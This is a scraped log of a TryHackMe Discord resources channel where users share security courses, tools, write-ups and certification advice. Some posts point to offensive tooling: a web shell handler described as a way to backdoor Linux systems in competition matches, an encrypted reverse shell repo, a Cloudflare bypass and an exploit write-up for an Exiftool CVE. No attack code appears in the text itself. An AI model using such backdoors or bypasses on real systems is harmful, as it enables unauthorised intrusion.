#resources
1 messages · Page 12 of 1
With?
hacking
More specifically?
What do you mean by "things"?
uh like ppls account for stuff am learning am not gonna do anything to there accounts
-ban @karmic axle Said they wanted to hack people's accounts. Ban appeals are by email: bans@tryhackme.com
🔨 Banned SM_sGHg#6788 indefinitely
@odd quest i need WordPress website pentesting tool
Try wpscan
hmm ok
Hi guys. Does anyone know how to install volatility on kali linux? I am having 'failed to import volatility ...' errors.
https://www.codecademy.com/learn/introduction-to-cybersecurity came across this free basic course. Probably not useful for most of us on here but might be one to recommend for a good basic grounding in cyber.
Awesome resource, a lot of bits and bobs that we might forget during work. Great job.
Oh btw do you think you could put it up for duplication? If not then np I will just bookmark it
thanks a lot , i am glad it helps
i dont think i can do that it notion unfortunately
its by using share > share to web > allow duplicate as template
Oh yes I see, I didnt work with fruition yet so Idk either but np, thx for the resources :v
Pretty cool app for URL analysis https://github.com/obsidianforensics/unfurl
They also use name-that-hash 😉
Just released v0.6 of stegseek (a fast steghide cracker for your favourite steg chals)
https://github.com/RickdeJager/stegseek
changes:
* added a --continue flag to search for multiple passwords
* added an --accessible flag to get rid of most to the terminal bloat
* Improved performance (aka, actually remembered to build in release mode)
* Fixed cracking failing for BMP files (shout out to PicoCTF)
* Added pretty colors
Can anyone suggest any deblurring tools for images?
@clever dove maybe this? this focuses on text afaik
https://github.com/beurtschipper/Depix
That's not what I was looking for exactly, but I found a tool called deblur on github. Thanks by the way.
Does any1 of you know of, or did research on a comparison of dirbuster, dirb, gobuster, ZAP and Burps directory brute forcing speeds on same settings (e.g. no recursion) or can tell from their experience what tool to prefer? My experiences with gobuster are very good, how are yours?
Feroxbuster is very fast ig, didn't tried myself though
feroxbuster is a beast. it has the autotune future to ensure that you get the least amount of errors
nice little primer on the command line (linux specifically)
https://github.com/jlevy/the-art-of-command-line
OSCP Voucher Giveaway!
TryHackMe will be releasing a challenge this Friday, including a giveaway for an OSCP voucher, generously donated by @q8fawazo! The winners will be announced on Discord, so make sure to pop in and meet everyone prior to starting!
https://t.co/FOrwCOzfMb
Hey guys i was wondering if THM has any bluetooth hacking or protocol related rooms thanks !
In general would like any sort of resources related to bluetooth hacking thanks !
Automating the process of Lxd Based priv esc 🤠
Im thinking of creating automated characteristing testing of the request flow from burp suite, or similar recorded flows, anyone familiar with automated testing such as this? 🙂
Trying to figure out how to start refactoring a large legacy codebase without crashing areas of the system at each change
having Signal on your phone might make forensic evidence extracted your phone inadmissable in court, also Cellebrite is being naughty and potentially using Apple DLLs without license
https://signal.org/blog/cellebrite-vulnerabilities/
Cellebrite makes software to automate physically extracting and indexing data from mobile devices. They exist within the grey – where enterprise branding joins together with the larcenous to be called “digital intelligence.” Their customer list has included authoritarian regimes in Belarus, Russi...
That article is hilarious
By a truly unbelievable coincidence, I was recently out for a walk when I saw a small package fall off a truck ahead of me. As I got closer, the dull enterprise typeface slowly came into focus: Cellebrite.
lmfao
It was the "aesthetically pleasing" files being shipped to random users' phones in the last paragraph that had me absolutely howling
Same here. Just to protect them legally
thanks for sharing. can you give feedback to any of these if you've checked them out? I mean, other than the most prominent ones, like portswigger and msfu
Gave +1 Rep to @sonic abyss
^^ weekly recap of all cyber security news this week
Hello community! Meet dystic, an open-sourced application designed to make job search more accessible towards individuals with disabilities.
View our demo video here that we presented to Google Cloud Platform!
https://www.youtube.com/watch?v=z8pLLa1Dygc
The link to the repository here: https://github.com/arnavs-0/dystic
You can also preview the application here: https://dystic.web.app
Special thanks to Google Cloud Platform for sponsoring our project! We hope to make it even better through contributors and supporters in the future.
If this sounds interesting to you, please fork our project and be part of the team.
Let's make job search more accessible!
Does anyone have any good resources explaining port forwarding and proxies? they're too confusing, I don't really understand it and it's kind of annoying me lol
Like I think i kind of understand port forwarding but proxies confuse the hell out of me
Done wreath?
@shut ferry I highly suggest you to do this easy and fun room https://tryhackme.com/room/chillhack and read this write-up throughout and you will definitely understand the basic idea behind port forwarding (you will see it happen live). https://musyokaian.medium.com/chill-hack-walkthrough-tryhackme-498aa9ad1388 Just go out of the comfort zone and do port forwarding using the two methods used by the write-up author (SSH and Chisel) and you shall understand.
Nice, thanks a lot man! I'll give it a look
Gave +1 Rep to @grim jasper
I'd 100% recommend wreath tho, seeing as it explains those methods thoroughly
Yeah doing it rn
It's got me super confused
I'm on the Chisel task
Yeah wreath is incredible 🙂
@odd quest But a bit more advanced than the others
I'm trying to learn chisel syntax but I'm finding it extremely hard and frustrating because I don't really understand what's going on in the syntax (like why --socks5 is used sometimes and other times not, same with --reverse)
or when I should put attacking_ip:listen_port compared to maybe target_ip:listen_port
I mean, I think it's better to have the content walked through than to read the writeup for a box and do it without understanding
thats why i figured i should try to understand proxies and port forwarding
i feel like learning the syntax just by memory sure that would work but i wouldn't really understand why the specific syntax is used
i might just push on with wreath though, I'm sure it'll become a little more clear on the practical task
@odd quest Nah, the write-up i mention is easy enough to explain the idea without using a word since you will see what is happening by pictures and you will get to see it with your system.
But does it explain how it actually works beyond the effects?
i think ill keep going to the practical task and if im still confused by then, ill try to understand proxies and port forwarding more
that way I won't get "stuck" for no reason
@odd quest No thats not what I am after
Pretty sure that's what blund is after?
A technical explanation of the concepts rather than just the practical effects?
yeah I think I got the hang of the effects of proxies and port forwarding (isnt it essentially used to get around something, like a firewall blocking a certain port)
its really confusing because i feel like i somewhat understand it but then when i try to learn syntax it's like "wait what??"
@shut ferry This will also help you if you want to practice port forwardin https://tryhackme.com/room/badbyte
Thanks! 
Gave +1 Rep to @grim jasper
@shut ferry Most welcome 👍
Tbh maybe I'm just overthinking the syntax, it will prob come naturally the more i use chisel and port forwarding etc
True true
the same when I first learned transferring files using nc, you will be confused and refer the website that teachers the method zillion times then it comes naturally
(For anyone interested: https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/)
(Much simpler and quicker than using a http.server ;D)
The Cyber Plumber's Handbook homepage with a description, reviews, sample, table of contents, and author information.
another page that has helped me is a section in msfu, let me look for it
Thanks a lot!
Gave +1 Rep to @crimson thunder
concatanate the infosec resource hoarder
I had to for ejpt 😉
yeah, you always go overprepared
not in this topic, cause I remember searching for something comprehensive on pivoting but couldn't find something (other than the book I mentioned before)
in the end I used my own joplin notes from the ton of articles I had read
come to think of it, I should write the thing 😛
nice good luck with it 😄 joplin is brilliant, you can also create roadmaps with mermaidjs
i was thinking of putting roadmaps on my website(ghost) with mermaid js
i have my notes in joplin with it, so it's quite easy to just lift and shift
if you do it send me a link to check it out
any buffer overflow resources
tib3rius and TCM have some good content on it
they're more focused on Windows though iirc, as OSCP prep
Nightmare: an intro to binary exploitation / reverse engineering course based around CTF challenges.
if you want buffer overflow and so, so much more
Thanks
Gave +1 Rep to @glacial gazelle
will do 🙂
Hey hackers,
Here's the practical demo video of automated-exploit-downloader script.
Hoping that it adds some value in your pentesting process
whys the link say youtu.be instead of youtube.com
It is the same thing?
virustotal.com say its clean so...
https://youtu.be/3tg7W1Sg9_Y redirects to https://www.youtube.com/watch?v=3tg7W1Sg9_Y
Basically youtu.be is a YT link shortener.
#JayavamsiVilluri
script/repository link
—
https://github.com/shamsi9/automated-exploit-downloader
bgm composition credits
—
selff
twitter
—
https://twitter.com/JayavamsiV
#JayavamsiVilluri
script/repository link
—
https://github.com/shamsi9/automated-exploit-downloader
bgm composition credits
—
selff
twitter
—
https://twitter.com/JayavamsiV
For some additional context: When you use the Share feature of the YouTube mobile app, it generates a https://youtu.be link
Check pins, there are a lot
Share feature on any platform on YouTube I think, not just mobile
an article I wrote :p https://husse1n.com/windows-child-parent-process-relationship/
Windows Operating System Processes explained, We will talk about the relationship between the parent/child process in the Windows operating system.
It goes without saying that being a Professional Penetration Tester is one of the “sexier” jobs in InfoSec. I mean, let’s be honest here - who wouldn’t want to break into buildings, and hack companies like Elliot from Mr. Robot, or carry out crazy hacks against banks and casinos like in the Oceans Series, all while doing it legally?
What are the best books to start pen testing? Any suggestions please.....
link above has a coupla recommendations
Does anyone have a good resource for setting up a python2 and impacket docker container to run older exploits that haven't been ported to python3?
Building a docker container for python2 should be fairly straightforward. I don't know anything about impacket though
I ended up just installing pip2.7 so I can get impacket for python2
Heath is getting ready to release his certification exam in a week, im impressed he kept the price point he originally promised - definitely one Ill consider
https://twitter.com/thecybermentor/status/1386908806773362690
Some exam updates:
-
Beta testing is now complete. Feedback was overwhelmingly positive.
-
Current hangups are around order & exam scheduling automation.
-
Launch price will be $299 standalone and $399 w/ all 5 courses from the Academy
-
Should launch within the week :D
156
I was doing this thing where i try to learn and note topics i learn everyday maybe it would help or motivate someone to do the same :
@tranquil shuttle Great 💯
thaanks a lot 
ooh cute
new Sysmon update
This update to Sysmon adds a FileDeleteDetected rule that logs when files are deleted but doesn't archive
Free pfsense plus training
Plus CC:ghidra and radare2 room
dude its payed
all those resources are free
maybe you should've clicked the link to see the free book
dude can you send me
I gave you the link
click the link within the link
I'm getting worried
do you see big ass letters that say "Proceed to the website"?
yah
and?
you on the page, you then download the book in whatever language you want
so apparently you have to pay at least $1 to access the book, if you don't wanna pay $1, then look at the other links I posted
it used to be free but its a very popular book and he probably wanted a little money from it
The Cyber Mentor just announced his certification, ik it won't have much recognition but its very affordable and has a pretty impressive scope - i just got a voucher and looking to take it later this year
https://twitter.com/thecybermentor/status/1387844742650662914
It's finally here! The Certified Practical Ethical Hacker (CPEH) exam simulates a real-world external/internal pentest, requires a written report, and a live debrief.
This is an intermediate exam meant to test field readiness.
You can enroll here: https://t.co/UlruV4Wxm1
172
Agreed, that seems great.
that's the book
Its a private server link @devout coral
https://scriptingxss.gitbook.io/firmware-security-testing-methodology/ this as a resource is amazingly good
Hello I am new to tryhackme discord. I was wondering if anyone had any advice on where to go to a little bit more about bug bounties and to just improve my skills on hacking
https://github.com/watchdog2000/WatchdogsPerch-WebShellHandler this is how I backdoor linux systems in KOTH matches sometimes, to leave a vulnerability on the server hidden away. I also use this instead of immediately uploading a pentest monkey shell, instead using this to catch a shell or enumerate. It offers more flexibility in places.
hey i need one more help
can anyone suggest me best and beginner tool for reverse engeering
try reading @remote wind blog. he has some good blogs
@remote wind can u please shar elink/
To be honest, I'm sorta interested
It looks affordable, and contains useful information while studying for the cert. It's probably best used to increase knowledge
Hey! Do you know maybe if this is introductory price, or it will stay on that level?
im not sure tbh, its possible it could become more expensive if the demand rises enough
I updated the website after so long. If downloading CLI tools isn't your thing check out the website by @night plinth ! ❤️ 😄 https://twitter.com/bee_sec_san/status/1388804441332195329
Ok. Thanks!
Gave +1 Rep to @fast wraith
Can anyone provide me nmap best course
I have found this course useful : https://www.udemy.com/course/the-complete-nmap-ethical-hacking-course-network-security/
you can search in youtube. Watch video tutorial then practice in THM.
As a beginner, watching videos at first, helps to get concept easily. Then THM helps to be better at any skill.
https://aksheet10.medium.com/what-is-nmap-218784bcb495 even try this i spent some time making this
If anybody struggling with gitbash and git commands read this medium article your all doubts will be solved that’s for sure.
50% off tcm courses with 50OFFSITEWIDE coupon
Here's a link : https://academy.tcm-sec.com/courses
Might make public and private digital forensics labs to look around for pen testers to assess risks in their all digital forensics suites
absolutely amazing resource, thanks a lot for sharing!
If you Are Interested In Developing your Hacking skills
Read some amazing @BlackHatEvents pdf <3.
Demo Google dork: site:https://t.co/SZEFjp8U6N intext:"RCE" filetype:pdf
#CyberSecurity #BugBounty #infosec
290
945
Anyone take any of these courses? Thoughts?
I might sound biased because I'm an admin over there at TCM discord but I don't get any money from his sales 😆
But IMO the PEH is by far the best course to get started when you just have basic foundational skills.
The privesc courses are very good but I've heard Tiberius courses are awesome too. Some people prefer one some people prefer the other.
The OSINT and EPP courses are great because there isn't much material out there teaching this stuff
I took one of tcm's courses
I havent started yet but i was told its great quality
I took the 25 hour course because it had a discount on udemy
so you got it/purchased it but haven't taken it yet? I have done half but got distracted but PEH is a great course
i bought it on the udemy site yesterday
but havent started it yet
i hope its good
thats what i meant by took, i didnt complete the course per because i just bought it (and it was also late at night so i didnt bother starting it)
No prob, yeah it’s a solid course
PEH is good enough. I have completed it.
I have faced problem in the Active Directory section.
Because I don’t have a 32GB ram pc and that section requires more knowledge on windows.
However the rest of the course is good for a beginner.
Currently completing TCM OSINT course and this is awesome
Can I have something for Blue Team Path? Some books or something to read on and practice..and also am trying to grasp the THM defense path and enjoying that
Defensive Security Handbook (2017)
Blue Team Handbook: SOC, SIEM, and Threat Hunting (V1.02): A Condensed Guide for the Security Operations Team and Threat Hunter (2019)
Thanks will surely look for them
Gave +1 Rep to @south marlin
Hi guys !
Does someone know a good podcast related to cybersec ?
I've heard people mention darknet diaries, but I haven't used it personally
darknet diaries, cyberwire, the hacker mind are a few good ones
Thank you ! I'm going to start darknet diaries
script I made to parse PCAP files with the help of zeek and some other basic utilities - may help with the recent room release 😉
https://github.com/Droogy/noCap
The ethical hacking one is in my opinion very good
im at buffer section
hi
BOUNTYPLZ https://www.udemy.com/course/intro-to-bug-bounty-by-nahamsec/ 71%-off code
scylla down, any alternatives?
It moved
I think it's this one it moved to https://scylla.so/
Oh, I see, thanks folks! 
you can use the wayback machine to view cached version of scylla, kinda annoying but gets the job done
Thank you @balmy sun.
Also, Please give me a feedback if you have completed it
Gave +1 Rep to @balmy sun
Thanks
Gave +1 Rep to @small night
👍
Check If Your Email or Username was Compromised
Hello I am new to this discord server
Anyone here to welcome me 😁😁
Thanks!
Gave +1 Rep to @fickle mulch
hey, I am looking for a specific wordlist, any idea where I can find some if google does not want to help me?
rockyou.txt ?
lol
here you go https://github.com/danielmiessler/SecLists
you can also sudo apt install seclists
also check /usr/share/wordlists on your kali box in case the one you're looking for is already there
thanks, I knew about them, but as I said I need a specific one 😄 or more precisely a star wars wordslist
What I did now was to copy the transcripts of some episodes of the mandalorian and extracted all unique words, but obviously some word combinations (like bounty hunter) will not be in that list
cool blog detailing an open-source investigation into APT operators from China
https://intrusiontruth.wordpress.com/2021/05/06/an-apt-with-no-name/
List of OSINT challenges / CTF's, when I get the time i'll add some more:
https://courses.thecyberinst.org/courses/osint-challenge
https://sourcing.games/game-1/
https://twitter.com/quiztime
https://courses.thecyberinst.org/courses/osintmini
https://twitter.com/Sector035/status/1211038518635614208
https://www.tracelabs.org/initiatives/search-party
https://tryhackme.com/room/geolocatingimages
https://tryhackme.com/room/googledorking
https://tryhackme.com/room/sakura
https://tryhackme.com/room/searchlightosint
https://tryhackme.com/room/somesint
https://ctf.cybersoc.wales/
https://tryhackme.com/room/ohsint
https://geoguessr.com
https://cyberdefenders.org/labs/38
https://app.hackthebox.eu/challenges
https://tracelabs.org/slack
https://tryhackme.com/room/mnemonic
https://tryhackme.com/room/jpgchat
https://tryhackme.com/room/shodan
hey I was wondering if any of you guys happened to like work like a job in cyber security? cause I have a question about like college.
try #cyber-and-careers and just ask your question there
Hello Guys, I just wanted to share with you another resource that I've found useful especially for people starting in this career
- They have some interesting articles
https://null-byte.wonderhowto.com/
~Happy Hacking!~
Null Byte is a white hat hacker world for anyone interested in hacking, science, networking, social engineering, security, pen-testing, getting root, zero days, etc.
Weekly news recap from our crosspost member Caramel from NordVPN
Has a ton of great word lists
ah yes this is a totally smart idea that wont use the entire drive :P
Maybe you just need a bigger drive?
Too bad yahoo answers shut down
If you can download ram, I don't see why that wouldn't be possible as well
I mean you cant do that either
Reposting this again, because the link @quiet fox shared here was not of this server:
Git Cheatsheet by Denver44
https://denver44.medium.com/git-cheat-sheet-e0425f3c466e
Okay 😊
@shut ferry
Thanks
Gave +1 Rep to @remote wind
Does anyone have some good up-to-date static binaries?
The andrewd repo has steps for building your own
This was just posted on our reddit, free udemy course on SQL injections https://www.udemy.com/course/sql-injections-unlocked-sqli-web-attacks/?couponCode=8MAY-SQLI
me who enrols in any course
I used to do that just because it's free
Anyone preparing for Sec+. I found this gem last night. It's a great review/overview of all the concepts
In this complete #compTIA #security+ course you will learn everything you need to know about IT / cyber security. Every topic of #IT #Security has been presented in a very comprehensive manner. Take this course to prepare yourself well to sit for the compTIA security+ exam.
**** Topics Discussed ****
Introduction to Network Devices (...
Same bruh 🤣🤣
This is like how to slap someone through internet
If anyone is interested in Forensics here it is a huge Github's repo about it, enjoy !
The same goes for Malware Analysis
Plus global resources on any cybersecurity subjects, will share more if anyone's interested 
https://github.com/watchdog2000/auth.log-connections-parser the ssh auth log monitor is done. It reports the amount of times connections from the IP are attempted and then reports all users that the IP attempts, and attempts to geolocate the IP too to report where the connection came from in the world.
Thank you. I can never remember the order.
Gave +1 Rep to @celest eagle
awesome. FYI two days left
great resource
https://www.whonix.org/wiki/Documentation
if you are confuse about how to find an article in this channel
it's simple as
in: #resources <the text that you want to find e.g. active directory>
This is a cool episode by Michael Bazzel (he just so happens to recommend my tools and says how much he likes them 👀)
This week Jason joins me to discuss hashes and how they apply to privacy, security, and OSINT, plus a quick chat about the latest Facebook data dump.
Direct support for this podcast comes from sales of my books and the online video training. More details can be found at IntelTechniques.com. Your support eliminates any ads, sponsors, endorsement...
Side by side reference sheet, very useful. I can't really explain it on text, so check it out yourself!
@tepid patio in the SANS foundations course (sec 275 - I think), they demo Ciphey for about 15/20 minutes 
Wow, really?? That's so cool!!!!
Yeah, you got Mr Lyne say about how great it was
lemme clip it for you, real quick
Oooh please, I'd love to see it!!
I'll send you a friend request, I think you've got public DMs off
accecpteddd
bee accept my friend request >:(
you never sent me pics of cute ducks, why would i?

:(((
HQ blog post regarding OSCP
Contains a ton of resources https://infosecwriteups.com/how-i-passed-oscp-with-100-points-in-12-hours-without-metasploit-in-my-first-attempt-dc8d03366f33
Some resources on learning blockchain would be nice if anyone got anything. Looking for something to start with. I have close to zero knowledge on the topic and I am planning on getting to a decent addable-in-CV-level.
bee posted some links in #bookclub , unless you're looking for specifically not books
When I said I have close to zero, the only thing making it not zero was the bee's article. 😂
Also, yeah, since my state is in lockdown, books aren't something I can get via delivery, and def not gonna read the pdf of those books. So some courses are preferred :)
i think thenewboston had a few videos on the matter // https://www.youtube.com/watch?v=Dgj_OStjD1Q&list=PL6gx4Cwl9DGCB3bm4ZuFAm4eADj0VMy_D
Join our community below for all the latest videos and tutorials!
Website - https://thenewboston.com/
Discord - https://discord.gg/thenewboston
GitHub - https://github.com/thenewboston-developers
Reddit - https://www.reddit.com/r/thenewboston/
LinkedIn - https://www.linkedin.com/company/thenewbostoncoin/
Facebook - https://www.facebook.com/then...
uh, thanks, I'll check that I guess, though I need some courses/ for blockchain as a technology. Mostly all I found was just crypto explained.
Gave +1 Rep to @ruby anvil
Compilation of start hacking websites: https://razvioverflow.github.io/starthacking
Here you can find a list, compilation, directory… of the best hacking sites. You’ll find sites where can start from scratch and progressively learn new techniques and sites where you can improve and test your skills.
i dont upload my room notes on git cause its all copy pasta 
Now that the proof of concept exploits for Exiftool's command injection (CVE-2021-22204) are slowly appearing, here's how you could've found the bug yourself, without knowing any Perl:
https://blog.bricked.tech/posts/exiftool/
(first blog post, feedback is appreciated
)
This writeup explains how to reverse engineer the security patch and craft an exploit for CVE-2021-22204, without any real Perl knowledge.
https://github.com/protofire/blockchain-learning-path
A reaalllly good learning path for anyone starting out in blockchain.
Sharing in case anyone else is interested: Google has some cloud security talks free online this morning (9am to 1pm US Pacific Time): https://cloudonair.withgoogle.com/events/security-talks-may-2021
(Disclaimer: I work there, though I have no direct connection to the event today)
As more and more organizations migrate to the cloud, it’s vital that you take every step possible to protect your data. Get the latest insights by joining us for Google Cloud SecurityTalks.You’ll get a variety of expert insights into the Google Cloud security ecosystem, including:How organizations are using Confidential ComputingZero Trust for y...
Just posted my new notes
Stacksmashing - Airtags : https://www.youtube.com/watch?v=_E0PWQvW-14
On Saturday, I managed to dump the firmware of the newly released Apple AirTags - and in this video I'll show how I did it.
I won't share firmware dumps or so, so please don't ask :)
Links:
- Colin on Twitter: http://twitter.com/colinoflynn
- Colin on YouTube: https://www.youtube.com/channel/UCqc9MJwX_R1pQC6A353JmJg
- Colin's company: https://...
great walkthrough!
I love the appearance, and the content is even better ;)
📢 THE TIME HAS COME📢
Today I make public ALL recordings and updated slides (+ FAQ) for my mobile security class, MOBISEC 2020!
Everything is available, for free, at: https://t.co/rIJ6WZG5xS!
Few words about this release in a short thread 👇
272
716
my very simple guide on how to use apache virtual hosts :)
(i moved it from my other website because gitbook is much easier to edit than the previous custom site)
https://work.jake-ruston.com/setup-guides/apache-virtual-hosts
@shut ferry haii can u add me also
@shut ferry i need some help in ctf can u help me
@night ridge Asking for help with active CTFs is generally regarded as cheating.
If it's for a tryhackme room, please use #room-hints or #room-help
How I learned to start worrying and love privacy
@flint vault
just a little thing I wrote to speed up boot2root machines ❤️
@glacial gazelle nice 1
ohhhh daaamn
Thanks for sharing gonnna use it in BG
Gave +1 Rep to @glacial gazelle
GG

its free 
nice one!
is CEH that bad?
Yes
yes
Outside of India, it holds practically no value
Still some companies want it 
oh lol, do you know why that is?
Im only thinking of getting security+ and the new cert by cybermentor
Pretty much India or US DoD only.
The new cert won't have any value to HR yet.
Any other certs beside ceh and oscp?
I want something that doesnt break the bank because i dont have a proper income
Sorry if in the wrong chat
I'm no expert, but I didn't think pentest+ was too reputable, when something like security+ keeps more doors open?
try and catch optional online, I think I've heard him speak about pentest+ before
lots of new updates to this one, I'd run a git pull in the directory if you don't want everything to go up in flames like it previously did 😉
In the DoD world, pentest+ and security+ and CISSP all fill the same requirements bucket
ah sure, I've only heard people speak about it from a private recruiter point of view
and judging by the CEH, DoD does things pretty differently...
It seems like any time anyone tries to do these things, they don't know what they are talking about. I'd wipe most of the certs out of the InfoSec path. Server+? MCSA? CCDP? CCNP? MCSE? Others here are just overall nope
I'm pretty sure the CEH is on the DoD list because it was one of the first security domain certs, not because its good. Once a thing is on a government list, it is really difficult to get it taken off without a really strong argument. Industry consensus isn't enough
yeaah I think Pentest+ is kinda the same its good for DoD purposes besdies that not really that great
prob try INE and elearn certs or CRTP is good for red teaming
for learning
Inside India, It's like THE cert to get cybersec Job.
It's just sad
wonder what EC-Council did to achieve that
https://thexssrat.podia.com/uncle-rat-s-xss-guide?coupon=DUK1P21
Free for about 4 hrs
https://lucanuscervus-notes.readthedocs.io/en/latest/Windows/AD - Computer Accounts/
Was trying to read up something about Computer accounts in AD, this was the best I found. You'll probably learn something.
yeah ill agree with that. many of the cert's don't really fit into the security roadmap.
now that you say it... this map is trash.. yeet and delete because it's missleading
what's a good place to learn buffer overflows?
I'm currently on the 7th episode of TCM's course, but it's still a bit confusing\
https://tryhackme.com/room/bufferoverflowprep
you can try this
and this can help you too
https://steflan-security.com/complete-guide-to-stack-buffer-overflow-oscp/
that's a CTF with BO's
not the basics of them
ah thanks
Gave +1 Rep to @steel cosmos
An inventory of tools and resources about CyberSecurity
This is amazing. Thank you
Gave +1 Rep to @steel cosmos
sharing is caring i guess ^^'
migrated my blog from Wordpress to Hugo over the weekend, only a few posts left to transfer
https://droogy.tech/
looks very sexy droogy
plus, it's not wordpress ❤️
ty ty 😄
how did you write it/what tools?
I just used the Terminal theme from Hugo with a few tweaks and have that deploy the content onto an apache server
interesting. why not use github pages?
i like the flexibility of having a VPS that I can do whatever with, i use droplets from digital ocean and pay about $5 for it
"Happy Mid-May! Please enjoy this 50% off coupon all courses, bundles, gift certs, and access passes:
Academy (https://academy.tcm-sec.com/) - 50OFFSITEWIDE
Udemy - 50OFFSITEWIDE-UDEMY2
This makes our best selling hacking courses as cheap as $10/course. Good through the week 🙂" - TCM
I don't know if someone already shared it but anyway, saw on Twitter today, enjoy !
https://www.hackingarticles.in/a-beginners-guide-to-buffer-overflow/
hello friends, is there such thing as a reliable, online, free anti virus checker where I can upload a file and have it check if it has any virus signature? I believe google drive and other cloud providers do this, I am curious if they are using some AV engine that has an open source version available for the public to be used or ported to integrate with your own software
this is my route to getting deep into cyber sec
2) hackthebox
3)pentesters lab
4) portswigger academy
5)bug bounties (+ cold hard cash)
6)certs```
i cant pay for certs initially,since i dont have any income
but if i can get into bug bounty,i can use that to fund my certs
what do you guys think?
VirusTotal
someone else recommended the same, thank you!
Gave +1 Rep to @sonic abyss
bug bounty isn’t easy bro. Even you can find a bug, there is no guarantee for payment. Too much competitive.
Private programs are good for this reason but it also takes a lot of hard work.
However, keep trying. Play CTF. Try to get experience and job
thanks bro
Gave +1 Rep to @fickle mulch
yes i have reconsidered in the last few hours
it doesnt seem realistic to me
and i dont really like the web
I would aggree 0xash Bug Bounties are not a stable thing for income imo if you can invest some money in certs that helps you in getting a job soo once you have a job you can use that money for certs
as imho Jobs are more realistic and reliable income source then bug bounties as they tend to be super competetive and then unreliable as well
i meaaaan for 15
idk how the job economy works lol
i would say just build your skills atm
i think no company hires before 18 or the legal working age in your country ( Could be 16 or something)
(I could be wrong)
cause i cant work because of my age 😆
but i wont be able to fund my certs without money,and i wont get money with a job (which i cant get)
you are starting out young and trust me , its better to chill out with looking for jobs so young
you gotta chill homie you are 15
learn with all the resources you can afford and build your skill
maybe just grind on free to affordable content
then you will be a prime candidate for every job you apply
until im able to work
thats the spirit
No problemo
+rep @tranquil shuttle
Gave +1 Rep to @tranquil shuttle
Maybe take notes. So you can show the knowledge you got
i will make a small lil repo with my free/affordable resources
brilliant!
make em public
can you dm me 
epicc
#resources message check out this link. There are some good resources @idle mural
chek this as well
@idle mural Here you go just so i dont forget i will send it now
thank you!!!!!!
I am still adding some stuff about Reversing, Web, Exploit Dev
Don't touch my boyfrend

hi does anyone have any resources for bash scripting? (free please)
https://overthewire.org/wargames/ Learning the Linux command line in depth first is my recommendation
should i also do these rooms besides ruby i feel like i can learn a thing or two
did u
just copy my idea?
na u didnt
i meaaaan i have always had resources in my notes for the past year i can say the same thing in reverse, but i just wanted to make it more accessible
sry

just saw ur
it contains more stuff
lemme copy some 😂
and link 1 to ur repo
@tranquil shuttle ill link to ur repo in my repo u can do the same 😂
would recommend exericism.io to learn bash
and also you can try doing the rooms you sharwd the screenshot for
they are preety noicee and helpfull
also rooms about linux commands will help a lot
+rep @tranquil shuttle ty
Gave +1 Rep to @tranquil shuttle
savin for later defintiely
no problemo 
really good blog post on SDR and creating a trunk scanner
https://www.blackhillsinfosec.com/using-sdr-to-build-a-trunk-tracker-police-fire-and-ems-scanner/
Ray Felch // Introduction Recently, I came across an interesting article on using software-defined radio (SDR) to create a Police, Fire, EMS, and Public Safety systems scanner. Viewing a few of these Trunk tracking scanners on Amazon, I quickly discovered that they are not cheap at all. You can spend several hundred dollars on a Trunked Radio t...
Hey guys,
If you're a fan of tmux, it's always useful to keep a dedicated script for connecting with **THM **network via OpenVPN and spawn multiplexer windows for convenience. I wrote a simple bash script to do these jobs with a one-click launcher.
I'm pretty much a beginner and would appreciate suggestions/improvements
https://gist.github.com/bijoy26/002e5b6734a277bc0c1fafb19283805a
hey, that's pretty neat
good job!
people have encrypted openvpn files?!
Your boyfriend is safe da
In this video, I will be demonstrating how to perform privilege escalation on Windows through various tools and techniques. We will take a look at performing local enumeration, using the windows-exploit-suggester, performing token impersonation attacks, and dumping hashes. We will also be exploring the pass the hash attack and how to use NTLM ha...
ENCRYPTED REVERSE SHELLS FTW 🙂 - easy use encrypted reverse shell: https://github.com/watchdog2000/encroshell/
pretty damn cool find
https://twitter.com/cyb3rops/status/1395009709787258882
Yee, Muir does this in Wreath which is neat.
Is this something he only does in the "internal"/"creation" part of the room? I don't recall seeing this when I did Wreath, but maybe I just forgot.
It's in the section for the SSH pivoting
The key is created but has limited scope so that it can't be used for much more than the proxy
Specifically the reverse ssh pivot
Gotcha. I'll have to go back and take a look at it again. I must've forgotten it
Regular expressions are universally embedded in the world of information technology. They are a part of many programming languages, databases, search engines, and command-line tools.
Very helpful for OSINT's rooms
https://github.com/jivoi/awesome-osint?utm=twitter/GithubProjects
Lhost - Ur IP address to recieve connections on
lport - local port to reciece connections on
rhost/s - the machine u wanna attack
rport - remoter port on a machin u wanna attack
for example if there is a ftp vuln u need to set rport to the specific port running ftp with rhost as the IP ur attacking
for those who are new with metasploit a small options guide
¯_(ツ)_/¯
Nmap Firewall Evasion
https://youtu.be/NfLdXre3Rws
In this video, I demonstrate various techniques that can be used to evade firewalls and IDS's with Nmap. Nmap is a free and open-source network scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap provides a number of features for probing computer n...
@shut ferry Hi.
That video is private. In addition, please keep all conversation in English in this discord.
https://www.youtube.com/watch?v=f38oRxybF88
This is the video that I uploaded this week
If you're posting tryhackme writeups, please post them in #thm-community-media
really good primer on note-taking methodology in Obsidian - specifically meant for bug bounty but applicable to any other domain too
https://www.youtube.com/watch?v=r9xa5kMNVpQ
I'm back! Sorry about the time away, I have a PhD now and I just started a job at Bugcrowd. But while I've been taking a break the way I take notes has changed a lot since the Notion video and Notion doesn't really work for me anymore. So in this video, I'll show you how to get started with Obsidian, what it is, how it works, and why it's awesom...
any cool books/blogs/talks/videos on o365/exchange security?
i like the benchmarking and hardening guides that CIS releases, this is a little outdated but I think you can find an updated version on their website if you register
http://www.itsecure.hu/library/image/CIS_Microsoft_Exchange_Server_2013_Benchmark_v1.1.0.pdf
awesome thank you x
Gave +1 Rep to @fast wraith
@fast wraith and @night ether - CIS has a new version of the Benchmarks for Exchange server 2016. You'll have to register (for free) with CIS to download the documents, though. https://www.cisecurity.org/benchmark/microsoft_exchange_server/
Nice find! - Thank you
Gave +1 Rep to @light crystal
FREE - Python For Ethical Hackers 2021
https://www.udemy.com/course/python-for-ethical-hackers-new/?couponCode=FREETIME
FREE - IP Addressing and Subnetting – Zero to Hero
https://www.udemy.com/course/ip-addressing-zero-to-hero/?couponCode=MAY21FREE
udemy coupons 
That third one isn't free, but the first two are. Thanks!
Gave +1 Rep to @balmy sun
awesome, thanks!
Gave +1 Rep to @jagged tiger
what a legend ty
Gave +1 Rep to @balmy sun
Bypass Cloudflare using Workers: https://t.co/KeEZA6WTFr
